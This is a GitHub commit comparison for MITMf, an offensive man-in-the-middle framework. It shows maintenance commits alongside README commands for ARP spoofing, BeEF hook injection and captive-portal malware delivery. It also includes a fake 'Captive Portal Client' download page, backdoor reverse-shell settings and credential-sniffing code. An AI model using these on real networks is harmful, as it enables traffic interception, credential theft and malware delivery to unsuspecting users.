Compare commits

..

73 commits

Author SHA1 Message Date
byt3bl33d3r
0458300e58
Update README.md 2018-08-28 23:37:24 +08:00
byt3bl33d3r
ca6ba15ee3
Update README.md 2018-08-28 23:37:00 +08:00
byt3bl33d3r
067cc4e337
Merge pull request #472 from rememberYou/fix/display
Fix indentation for arpmode
2018-05-04 11:19:17 -06:00
byt3bl33d3r
18814dd1a0
Merge pull request #473 from rememberYou/fix/alias-banner
Fix useless banner alias
2018-05-04 11:19:08 -06:00
byt3bl33d3r
0c844045cb
Merge pull request #474 from rememberYou/fix/file-reading
Add refactoring of file reading
2018-05-04 11:18:59 -06:00
Terencio Agozzino
2f802e71c7 Add refactoring of file reading 2018-05-03 20:28:54 +02:00
Terencio Agozzino
ab5a969e23 Fix useless banner alias 2018-05-03 19:56:31 +02:00
Terencio Agozzino
e44551bd54 Fix indentation for arpmode 2018-05-03 19:51:57 +02:00
byt3bl33d3r
906c7951df
Merge pull request #279 from oscar1/master
possible fix issue  #253 and #227
2018-03-27 01:59:47 +08:00
byt3bl33d3r
6407b1df9f
Merge pull request #416 from jlcmoore/master
Https load error, and incorrect variable name
2018-03-27 01:59:35 +08:00
byt3bl33d3r
8588921e09
Merge pull request #450 from sensepost/master
Netcreds update, fixing some versions of the CHALLENGE NOT FOUND bug.
2018-03-27 01:59:18 +08:00
Reino Mostert
9c4313c0eb This commit includes various fixes made to netcreds over the past two years. Most notably, it fixes the issue in which parse_netntlm_chal passes arguments to parse_ntlm_chal in the wrong order, and the failure of headers_to_dict to parse HTTP headers correctly, both of which caused the CHALLENGE NOT FOUND bug. This resolves https://github.com/byt3bl33d3r/MITMf/issues/436. The output format changes in netcreds have been left out of this commit. 2018-02-19 18:01:36 +02:00
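The header-parsing half of that fix boils down to splitting each raw header line on the first ': ' and lower-casing the key. A minimal sketch of that approach, mirroring the headers_to_dict rewrite visible in the diff further down (the example call is hypothetical):

```python
def headers_to_dict(header_lines):
    """Convert raw 'Name: value' header lines into a dict keyed by lowercase header name."""
    headers = {}
    for line in header_lines:
        parts = line.split(': ', 1)          # split only on the first ': '
        key = parts[0].lower()
        headers[key] = parts[1] if len(parts) > 1 else ""
    return headers

# Hypothetical example:
# headers_to_dict(["WWW-Authenticate: NTLM", "Content-Length: 0"])
# -> {'www-authenticate': 'NTLM', 'content-length': '0'}
```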
byt3bl33d3r
ba0989b677
Update README.md 2017-12-20 17:46:29 -07:00
byt3bl33d3r
da0c7356fe Merge pull request #425 from OmgImAlexis/master
fix header markdown
2017-10-18 10:28:56 -06:00
Alexis Tyler
aa11f2a12b
fix header markdown 2017-10-16 19:57:34 +10:30
Jared Moore
c8db6d3568 Https load error, and incorrect variable name 2017-08-07 09:57:56 -05:00
byt3bl33d3r
d535950994 Merge pull request #397 from Ritiek/master
Fix typo
2017-05-01 09:41:11 -06:00
byt3bl33d3r
5bf3e29e01 Update README.md 2017-04-30 23:56:19 -06:00
Ritiek Malhotra
182b3d704b Fix typo 2017-05-01 07:42:57 +05:30
byt3bl33d3r
13d469d979 Merge pull request #394 from camilleeyries/patch-1
Notice user when not running as root.
2017-04-28 11:47:06 -06:00
Camille Eyriès
acff5e6e44 Notice user when not running as root.
The mocking message that was at this place before was... hurting.
Fixed. (Maybe it's a design principle, I don't know.)

Example output: ```
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[-] The derp is strong with this one
TIP: you may run MITMf as root.
```
2017-04-28 18:47:26 +02:00
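The change behind this is a tiny early exit in mitmf.py; a self-contained sketch of the check that produces the message above (the same lines appear in the mitmf.py hunk further down):

```python
import os
import sys

# Bail out early with a hint instead of only the mocking message
if os.geteuid() != 0:
    sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
```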
byt3bl33d3r
431e0a78ec Merge pull request #389 from bryant1410/master
Fix broken headings in Markdown files
2017-04-18 20:36:53 -06:00
byt3bl33d3r
b04112ce07 Merge pull request #385 from gigawhitlocks/gigawhitlocks-patch-1
Fix misspelling in README
2017-04-18 20:36:34 -06:00
Santiago Castro
24d8722db3 Fix broken Markdown headings 2017-04-17 05:25:20 -03:00
Ian Whitlock
0684f7c156 Fix misspelling in README 2017-03-31 10:49:40 -05:00
byt3bl33d3r
0e81e40388 Merge pull request #254 from onedv/master
Captive portal redirecting using 302
2016-12-12 23:39:55 -07:00
byt3bl33d3r
40a5527358 Merge pull request #356 from hackereg35/patch-2
Update packetfilter.py
2016-12-12 23:36:32 -07:00
byt3bl33d3r
0c8c555158 Merge pull request #357 from hackereg35/patch-3
Update mitmf.py
2016-12-12 23:36:23 -07:00
byt3bl33d3r
e8dd557592 Merge pull request #346 from ZonkSec/master
spelling correction on "Zapped a strict-trasport-security header"
2016-12-12 23:18:45 -07:00
hackereg35
726c823628 Update mitmf.py
Added multi filter support
2016-11-03 15:55:13 +02:00
hackereg35
37937f74ba Update packetfilter.py
Added multi filter support
2016-11-03 15:49:06 +02:00
ZonkSec
f04ccf9d31 Update ServerConnection.py 2016-10-11 12:17:33 -05:00
ZonkSec
6e9d9ba707 Update ServerConnection.py 2016-10-11 12:16:27 -05:00
byt3bl33d3r
2dc1dd4f12 Hold on to your butts cause here we go.
This should resolve:
* Issue #307
* Issue #309
* Issue #302
* Issue #294

Apparently, Twisted made some fairly heavy API changes in their 16.x
release which kinda fucked all the plugins up.
2016-06-08 23:39:58 -06:00
oscar1
18c8f9119c Merge pull request #1 from oscar1/oscar1-patch-1
Update ARP.py
2016-03-06 15:50:40 +01:00
oscar1
d59b282fb9 Update ARP.py
small change to fix the "half duplex" issue. First, without the fix I don't receive any packets from the remote host to the target; I only receive packets from the target to the remote host. Second, the original code wasn't "symmetric". Tested on Kali 2 with a Linksys WRT54GL router over WiFi, comparing the ARP packets to those produced by ettercap, which was working correctly on my system. With the fix, the packets resemble the ettercap method. It also works correctly when the arguments to the Ether() constructor are removed altogether.

Note that the problem occurs when not using any modules at all, only a simple filter and the spoof plugin. The problem may also be router-specific, I don't know.
2016-03-06 15:48:40 +01:00
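The fix described here amounts to building the Ethernet layer explicitly and sending the poison packets at layer 2, symmetrically in both directions. A minimal scapy sketch of that idea, with placeholder MAC/IP values (the real change is in the ARPpoisoner hunk further down):

```python
from scapy.all import ARP, Ether, sendp

# Placeholder addresses, for illustration only
my_mac                  = "aa:bb:cc:dd:ee:ff"
target_ip, target_mac   = "192.168.1.10", "11:22:33:44:55:66"
gateway_ip, gateway_mac = "192.168.1.1", "77:88:99:aa:bb:cc"

# Poison both directions at layer 2 so traffic flows through us symmetrically
sendp(Ether(src=my_mac, dst=target_mac) /
      ARP(op="is-at", pdst=target_ip, psrc=gateway_ip, hwdst=target_mac),
      verbose=False)
sendp(Ether(src=my_mac, dst=gateway_mac) /
      ARP(op="is-at", pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac),
      verbose=False)
```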
byt3bl33d3r
06ef1da084 Merge pull request #259 from HAMIDx9/master
Multiple fixes, netcreds, hsts dns, inject plugin
2016-01-30 11:51:09 -07:00
HAMIDx9
96e0b5f0e0 Fix #230 HSTS bypass DNS problem when timeout occurs 2016-01-29 01:43:45 +03:30
HAMIDx9
f8293c38c9 Fix returning data; check the MIME type to avoid the heavy chardet process, since we are not interested in other MIME types. 2016-01-29 01:42:54 +03:30
HAMIDx9
2490b87f43 Fix printer format to print logs and avoid netcreds shutting down 2016-01-28 22:03:07 +03:30
Oliver Nettinger
822b87e77c Captive Portal related changes
Made options exclusive
Added OSX files to .gitignore
Update README with plugin
2016-01-19 07:52:23 +01:00
Oliver Nettinger
681be498a9 Added captive portal plugin 2016-01-14 11:11:21 +01:00
byt3bl33d3r
d542dc139f Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-11-03 17:57:47 -07:00
byt3bl33d3r
640f02a8a3 Added imagerandomizer plugin 2015-11-03 17:57:41 -07:00
byt3bl33d3r
5a6e0f6f48 Merge pull request #204 from xmcp/xmcp-patch-1
fixes #201
2015-10-22 12:31:51 -06:00
byt3bl33d3r
d0b4fd66fa Merge pull request #207 from orthographic-pedant/spell_check/arbitrary
Fixed typographical error, changed arbitary to arbitrary in README.
2015-09-30 19:50:14 -05:00
orthographic-pedant
ba280cc64c Fixed typographical error, changed arbitary to arbitrary in README. 2015-09-30 18:51:40 -04:00
xiao-mou
f7396d631d bugfix 2015-09-28 21:22:10 +08:00
byt3bl33d3r
f6ffad2879 Merge pull request #193 from xmcp/xmcp-patch-1
fixes #192
2015-09-14 20:27:21 +02:00
byt3bl33d3r
589e45b64f Fixed IPtables for APF Mode
Added a new banner
2015-09-14 20:25:24 +02:00
xiao-mou
b04d2e0258 bugfix 2015-09-10 17:20:15 +08:00
byt3bl33d3r
16b774248d updated bdfactory to latest commit 2015-09-06 13:52:32 +02:00
byt3bl33d3r
5b7967f02d removed setup.sh 2015-09-06 13:28:24 +02:00
byt3bl33d3r
d1df76c601 fixes #188 2015-09-06 13:14:12 +02:00
byt3bl33d3r
22a43df4f8 DNS server now outputs all queries to a separate log file
Fixed a bug where the SSLStrip proxy wouldn't allow caching if the AppCache poison plugin is enabled
HTTP and SMB servers now listen on all interfaces
2015-09-06 12:47:07 +02:00
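The separate DNS log is just a dedicated Python logger writing to its own FileHandler; a short sketch matching the DNSChef hunk further down (it assumes the ./logs/dns/ directory exists):

```python
import logging

formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s",
                              datefmt="%Y-%m-%d %H:%M:%S")

# Dedicated logger so every DNS query also lands in its own file
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log')   # assumes ./logs/dns/ exists
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)

dnslog.info("Proxying the response of type 'A' for example.com",
            extra={'clientip': '192.168.1.10'})
```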
byt3bl33d3r
9add87c5b2 Fixed a bug where the DNS server would throw a traceback when multiple named servers are specified 2015-09-06 11:23:45 +02:00
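The traceback appears to come from calling .split(',') on a value that the config parser may already hand back as a list. A minimal sketch of the normalization idea shown in the DNSChef hunk further down:

```python
def normalize_nameservers(value):
    """ConfigObj gives a str for one nameserver and a list for several; always return a list."""
    if isinstance(value, str):
        return [value]
    if isinstance(value, list):
        return value
    return []

# normalize_nameservers("8.8.8.8")              -> ["8.8.8.8"]
# normalize_nameservers(["8.8.8.8", "1.1.1.1"]) -> ["8.8.8.8", "1.1.1.1"]
```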
byt3bl33d3r
a0fecd4a38 reverts changes from PR #183, fixes issue #187 2015-09-06 10:51:40 +02:00
byt3bl33d3r
bb3078ca40 added an actual .coveragerc for coverage 2015-09-05 15:41:32 +02:00
byt3bl33d3r
f7da7926df added coveralls support in travis 2015-09-05 15:19:46 +02:00
byt3bl33d3r
2042e8350d Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-09-05 14:57:15 +02:00
byt3bl33d3r
96c83ee565 added coveralls badge to the readme 2015-09-05 14:56:44 +02:00
byt3bl33d3r
c870d80d04 Merge pull request #183 from HAMIDx9/master
Fix improperly use config multiple nameservers
2015-09-05 14:45:33 +02:00
byt3bl33d3r
3fb6f21153 travis now uses notices instead of messages 2015-09-05 14:40:52 +02:00
byt3bl33d3r
333234a445 add skip_join to travis 2015-09-05 14:35:40 +02:00
byt3bl33d3r
c0934e1179 travis is picky 2015-09-05 14:25:33 +02:00
byt3bl33d3r
766e5b7a44 changed default IRC message template 2015-09-05 14:20:12 +02:00
byt3bl33d3r
650525ef12 added IRC notifications for travis 2015-09-05 13:56:01 +02:00
byt3bl33d3r
7512c51af5 updated .travis.yml for faster tests 2015-09-05 13:46:16 +02:00
HAMIDx9
00745afb35 Fix improperly use config multiple nameservers 2015-09-03 11:50:02 +04:30
byt3bl33d3r
df608030f3 fixes #178, we are now manually adding an Ether() layer to ARP packets and sending them at L2 2015-09-02 14:47:25 +02:00
byt3bl33d3r
e54b90aa7b fixes #182, iptables rules weren't being set 2015-09-02 12:02:56 +02:00
byt3bl33d3r
54c27ddade fixed Net-Creds tests 2015-09-01 14:31:12 +02:00
byt3bl33d3r
986b2b851f Fixed bug where Net-Creds wouldn't parse URLs and HTTP data when reading from a pcap
Active packet filtering engine and proxy + servers are now mutually exclusive; you can only start one of them (iptables conflicts)
2015-09-01 14:15:21 +02:00
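Reading credentials from a capture instead of the wire is done by streaming the pcap through the same packet parser; a minimal sketch mirroring the NetCreds.parse_pcap method added in the hunk further down (pkt_parser stands in for the Net-Creds packet callback):

```python
from scapy.all import PcapReader

def parse_pcap(path, pkt_parser):
    """Feed every packet from a capture file into the credential parser."""
    # PcapReader streams packets one at a time instead of loading the whole file
    for pkt in PcapReader(path):
        pkt_parser(pkt)

# Usage: parse_pcap("capture.pcap", pkt_parser), then exit once the file is exhausted
```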
43 changed files with 633 additions and 269 deletions

8
.coveragerc Normal file

@ -0,0 +1,8 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
pragma: nocover
pragma: no cover

4
.gitignore vendored

@ -57,3 +57,7 @@ docs/_build/
# PyBuilder # PyBuilder
target/ target/
# OSX Stuff
.DS_Store
._.DS_Store


@ -1,11 +1,27 @@
language: python language: python
python: python:
- "2.7" - "2.7"
sudo: required
before_install: addons:
- "ifconfig" apt:
- "sudo apt-get update -qq" packages:
- "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev" - libpcap0.8-dev
- libnetfilter-queue-dev
- libssl-dev
notifications:
irc:
channels:
- "irc.freenode.org#MITMf"
template:
- "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
skip_join: true
use_notice: true
install: "pip install -r requirements.txt" install: "pip install -r requirements.txt"
script: nosetests before_script:
- "pip install python-coveralls"
script:
- "nosetests --with-cov"
after_success:
- coveralls


@ -1,4 +1,4 @@
#Intentional contributors (in no particular order) # Intentional contributors (in no particular order)
- @rthijssen - @rthijssen
- @ivangr0zni (Twitter) - @ivangr0zni (Twitter)
@ -13,7 +13,7 @@
- @auraltension - @auraltension
- @HAMIDx9 - @HAMIDx9
#Unintentional contributors and/or projects that I stole code from # Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module - Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie - Responder by Laurent Gaffie

43
README.md Normal file → Executable file

@ -3,11 +3,14 @@
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg) ![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf) [![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf) [![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
#MITMf # MITMf
Framework for Man-In-The-Middle attacks Framework for Man-In-The-Middle attacks
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
@ -15,7 +18,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
Contact me at: Contact me at:
- Twitter: @byt3bl33d3r - Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf - IRC on Freenode: #MITMf
- Email: byt3bl33d3r@gmail.com - Email: byt3bl33d3r@protonmail.com
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .** **Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
@ -111,13 +114,33 @@ Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more! And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help``` For a complete list of available options, just run ```python mitmf.py --help```
#Currently available plugins # Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application - **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients - **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
@ -127,12 +150,22 @@ For a complete list of available options, just run ```python mitmf.py --help```
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing - **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type - **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks - **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transperently hijacks client sessions - **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients - **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy - **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content - **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins - **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages - **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitary content in HTML content - **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts - **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees - **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

31
config/captive/portal.html Executable file

@ -0,0 +1,31 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>

19
config/mitmf.conf Normal file → Executable file

@ -38,6 +38,7 @@
[[[A]]] # Queries for IPv4 address records [[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27 *.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records [[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1 *.thesprawl.org=2001:db8::1
@ -75,11 +76,19 @@
# #
# Plugin configuration starts here # Plugin configuration starts here
# #
[Captive]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace] [Replace]
[[Regex1]] [[Regex1]]
'Google Search' = 'Google yssas' 'Google Search' = '44CON'
[[Regex2]] [[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants" "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -89,7 +98,7 @@
# Here you can specify the client to hijack sessions from # Here you can specify the client to hijack sessions from
# #
Client = '192.168.1.26' Client = '10.0.237.91'
[SSLstrip+] [SSLstrip+]
@ -445,10 +454,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic PATCH_METHOD = automatic
HOST = 192.168.1.16 HOST = 192.168.20.79
PORT = 8090 PORT = 8090
# SHELL for use with automatic PATCH_METHOD # SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_inline_threaded SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload # SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
ZERO_CERT = True ZERO_CERT = True
@ -503,7 +512,7 @@
LinuxType = None LinuxType = None
WindowsType = ALL WindowsType = ALL
CompressedFiles = False CompressedFiles = False
#inherits WindowsIntelx32 from ALL #inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]] [[[[WindowsIntelx86]]]]
PATCH_DLL = False PATCH_DLL = False
ZERO_CERT = True ZERO_CERT = True


@ -65,6 +65,18 @@ banner4 = """
""" """
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner(): def get_banner():
banners = [banner1, banner2, banner3, banner4] return random.choice([banner1, banner2, banner3, banner4, banner5])
return random.choice(banners)


@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log)) logs.append(Log(log))
return logs return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}): def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options) payload = json.dumps(options)


@ -21,7 +21,7 @@ import pyinotify
import threading import threading
from configobj import ConfigObj from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent): class ConfigWatcher(pyinotify.ProcessEvent, object):
@property @property
def config(self): def config(self):


@ -110,7 +110,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
log.debug("[ServerConnection] Zapped a strict-trasport-security header") log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value


@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher):
if status == "1": if status == "1":
for p in ProxyPlugins().all_plugins: for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list): if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().addPlugin(p) ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0": elif status == "0":
for p in ProxyPlugins().plugin_list: for p in ProxyPlugins().plugin_list:
if p.name == plugin: if p.name == plugin:
ProxyPlugins().removePlugin(p) ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"}) return json.dumps({"plugin": plugin, "response": "failed"})


@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false- # Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds: class NetCreds:
version = "1.0" version = "1.0"
@ -51,16 +53,65 @@ class NetCreds:
except Exception as e: except Exception as e:
if "Interrupted system call" in e: pass if "Interrupted system call" in e: pass
def start(self, interface, ip, pcap): def start(self, interface, ip):
if pcap:
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()
def parse_pcap(self, pcap):
parsing_pcap=True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt): def pkt_parser(pkt):
''' '''
Start parsing packets here Start parsing packets here
@ -127,53 +178,7 @@ def pkt_parser(pkt):
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load # HTTP and other protocols that run on TCP + a raw load
